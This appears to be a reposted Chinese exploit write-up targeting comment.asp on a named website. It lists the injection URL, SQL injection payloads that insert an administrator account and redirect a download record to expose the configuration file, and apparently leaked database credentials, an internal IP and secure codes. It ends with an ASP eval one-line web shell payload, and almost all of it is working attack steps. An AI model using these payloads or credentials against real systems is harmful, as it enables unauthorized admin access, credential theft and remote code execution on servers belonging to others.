漏洞文件:common/comment.asp
注射点:http://www.hacker.com.cn/common/comment.asp?channel=article
构造函数:
提交“;insert into db_sys_manager (m_user,m_password,m_grade,m_hidden) values(’h4ck3rsb’,’c65c7821546571bb’,10,0);--”
定义:在数据库池里新建一个用户为h4ck3rsb密码为h4ck3rsbr的用户
附加函数:
提交“;UPDATE db_sys_upload SET u_url=’..\common\config\manage\configure.asp’ WHERE u_id=’850’;--”
定义:把\common\config\manage\configure.asp文件发送到download.asp参数里,参数是‘850’
数据下载:http://www.hacker.com.cn/common/download.asp?module=upload&id=850
const MANAGE_SECURE_CODE = "a485beeecb62bb0f"
CONST DB_TYPE = 1
CONST DB_TYPENAME = "sql"
CONST DB_DATABASE = "db_hacker"
CONST DB_SERVER = "192.168.0.2"
CONST DB_USERNAME = "hacker"
CONST DB_PASSWORD = "db_hacker_new.888"
const MANAGE_SECURE_CODE = "dad1dc19c10c7128"
突破验证:
本地空验证提交,可得webshell。
Msxml.DOMDocument"%><%eval request("#")%><%CONST OBJECT_TYPENAME_XMLDOM1 = "Msxml.DOMDocument
|
安全中国首页 > 文章中心 > 综合注入文章